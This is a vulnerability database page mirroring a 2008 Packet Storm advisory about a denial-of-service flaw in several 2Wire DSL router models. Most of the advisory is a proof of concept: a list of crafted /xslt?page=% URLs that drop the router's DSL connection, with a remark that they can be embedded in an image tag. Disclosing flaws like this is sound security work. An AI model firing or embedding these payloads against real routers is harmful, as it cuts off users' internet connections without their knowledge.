Lucene search

2wire-dos.txt

🗓️ 10 Nov 2008 00:00:00Reported by hkmType

packetstorm🔗 packetstormsecurity.com👁 17 Views

2Wire Router DSL Denial of Service vulnerability in multiple model

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`2WIRE ROUTER DSL DENIAL OF SERVICE  
  
  
VULNERABLE  
Model: 1701HG, 1800HW, 2071HG, 2700HG Gateway  
Firmware: v3.17.5, 3.7.1, 4.25.19, 5.29.51  
  
The DSL connection of some 2wire routers is droped when a request to /xslt with the value %X where X is any non alfa numeric character.   
  
PoC: (this can be set in an IMG tag or whatever)  
  
http://gateway.2wire.net/xslt?page=%&  
http://gateway.2wire.net/xslt?page=%@  
http://gateway.2wire.net/xslt?page=%!  
http://gateway.2wire.net/xslt?page=%+  
http://gateway.2wire.net/xslt?page=%;  
http://gateway.2wire.net/xslt?page=%'  
http://gateway.2wire.net/xslt?page=%~  
http://gateway.2wire.net/xslt?page=%*  
http://gateway.2wire.net/xslt?page=%0  
http://gateway.2wire.net/xslt?page=%9  
http://gateway.2wire.net/xslt?page=%?  
http://home...  
etc...  
  
  
hkm  
  
  
hkm {@} hakim.ws   
  
Greets: UNDERGROUND.ORG.MX, daemon, acid_java, beck, dex.  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

10 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4